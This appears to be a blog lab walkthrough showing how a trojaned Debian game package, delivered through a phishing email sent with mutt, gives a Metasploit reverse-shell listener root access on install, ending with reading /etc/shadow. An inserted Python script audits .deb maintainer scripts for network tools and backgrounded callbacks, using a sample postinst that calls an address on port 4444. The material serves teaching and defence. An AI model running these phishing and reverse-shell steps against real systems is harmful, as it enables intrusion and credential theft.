• Lucifer

Client Side Exploitation

In the Spear Phishing post HERE we saw how a malicious file can be delivered to a system by tricking a user into downloading and running a malicious executable. In this post, we will see how a malicious Debian package, when opened and installed on a target system, can provide an attacker with remote access to the system. So, let's see how we can do client-side exploitation step by step:

Step 1: Starting Metasploit Framework


First, we need to set up a listener that will wait for incoming connections. Launch the Metasploit Framework by entering the following command:


msfconsole -L

Step 2: Selecting Module


For this post we will use Generic Payload Handler, which provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework. Select the module by entering the following command:

use exploit/multi/handler

Step 3: Configuring Listener


Now let's configure the module to listen on the TCP port 4444 on our localhost IP and select the shell/reverse_tcp payload:

set LHOST 127.0.0.1

set LPORT 4444

set PAYLOAD linux/x86/shell/reverse_tcp

Step 4: Starting Listener


Now start the listener by entering exploit.

exploit

Now open a new terminal tab with Ctrl + Shift + T and switch to it.


Step 5: Sending Phishing Email


For this attack we will send a download link rather than an attachment. The following command will send an invitation to download a game from a website:


echo 'Check out this cool game! Download from <a href="http://skillsetlocal.com/moon-buggy.deb">here</a> for FREE.' | mutt -e "set content_type=text/html" -s "Game Download" -- admin@skillsetlocal.com

Step 6: Checking Email


We will use mutt again to read the email:

mutt

Step 7: Reading Email


You should see our email in the inbox. Hit Enter to open it.

Next, hit v to view the attachment (which, in this case, is just the body of the email). Hit Enter to open it.

You should see our phishing email message with the download link highlighted in yellow.


Step 8: Downloading File


Hit Enter to follow the link, then hit d to download.

Next, use the down arrow key to select Save to disk and hit Enter.

Hit Enter again to accept the default filename.

Step 9: Installing Package


Exit mutt by hitting q, i, and q again (or press Ctrl+C and then Enter to confirm). Now let's install the downloaded package with the following command:

sudo dpkg -i moon-buggy.deb

Do you see anything unusual? No. The package installs as normal, with no red flags raised. Now let's return to our listener.
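The install looks clean because dpkg runs whatever maintainer scripts (preinst, postinst, prerm, postrm) the package's control archive carries, as root and without asking. One check a defender can run before `dpkg -i` on a package fetched from a link like this one is to unpack the control archive and read those scripts. The following is an added example, not code from the original post or the lab: it parses the .deb ar container and control tarball with the Python standard library, flags a few suspicious line patterns, and runs against a constructed fixture (`build_deb`, `SAMPLE_POSTINST`, the helper path and 192.0.2.10 address are all assumptions, not taken from the real package).

```python
import io, re, tarfile
# Maintainer-script lines worth a look before "dpkg -i" runs them as root.
SUSPICIOUS = [
    (re.compile(r"\b(nc|ncat|netcat|curl|wget|socat)\b"), "network client"),
    (re.compile(r"\b\d{1,3}(\.\d{1,3}){3}\b"), "hard-coded IP address"),
    (re.compile(r"&\s*$"), "backgrounded command (outlives the install)"),
]
SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

def ar_members(blob):
    """Yield (name, bytes) for each member of an ar archive; a .deb is one."""
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):                      # fixed 60-byte member header
        hdr = blob[pos:pos + 60]
        name = hdr[:16].decode().strip().rstrip("/")  # GNU ar may append "/"
        size = int(hdr[48:58].decode())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)                 # members are 2-byte aligned

def audit_deb(blob):
    """Return [(script, line_no, line, reason)] for every flagged maintainer-script line."""
    findings = []
    for name, data in ar_members(blob):
        if name.startswith("control.tar"):            # maintainer scripts live here
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
                for m in tf.getmembers():
                    base = m.name.lstrip("./")
                    if base in SCRIPTS and m.isfile():
                        lines = tf.extractfile(m).read().decode("utf-8", "replace").splitlines()
                        findings += [(base, n, ln.strip(), why) for n, ln in enumerate(lines, 1)
                                     for rx, why in SUSPICIOUS if rx.search(ln)]
    return findings

def build_deb(control_files):  # minimal in-memory .deb; a constructed fixture, not a real package
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for fname, content in control_files.items():
            info = tarfile.TarInfo("./" + fname)
            info.size, info.mode = len(content), 0o755
            tf.addfile(info, io.BytesIO(content))
    out = b"!<arch>\n"
    for name, data in (b"debian-binary", b"2.0\n"), (b"control.tar.gz", buf.getvalue()):
        out += b"%-16s%-12s%-6s%-6s%-8s%-10d`\n" % (name, b"0", b"0", b"0", b"100644", len(data))
        out += data + (b"\n" if len(data) % 2 else b"")   # keep 2-byte alignment
    return out
# Constructed sample postinst: starts a backgrounded helper pointed at an address and port.
SAMPLE_POSTINST = b"#!/bin/sh\nset -e\n/usr/games/.mb-helper 192.0.2.10 4444 &\nexit 0\n"
def demo():
    return audit_deb(build_deb({"control": b"Package: x\n", "postinst": SAMPLE_POSTINST}))
```

On a real package, `ar_members(open("moon-buggy.deb", "rb").read())` feeds `audit_deb` the same way; a hit is a reason to read the script in full, not proof of a Trojan, and a clean scan does not clear the data archive's binaries.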


Now switch back to tab 1, where the listener is running.


Step 10: Using Reverse Shell


Let's see what kind of access we got. Enter the following command to see which user the shell is running as:

whoami

We are running as root! To confirm, let's read the /etc/shadow file, which only root can read:

cat /etc/shadow

Game over. Now switch back to the other tab.


Step 11: Playing Game


All quiet here. The admin user can enjoy the "cool free game" while the attacker enjoys root access to the system.

Enter moon-buggy to play the game. You can see that the package is fully functional, with a Trojan added as a "bonus feature".


moon-buggy

Also read: Spearphishing


That's it for this post; hope you like it. Please share it with your friends. More amazing stuff is waiting for you: check out the shop at Payground or visit HERE.
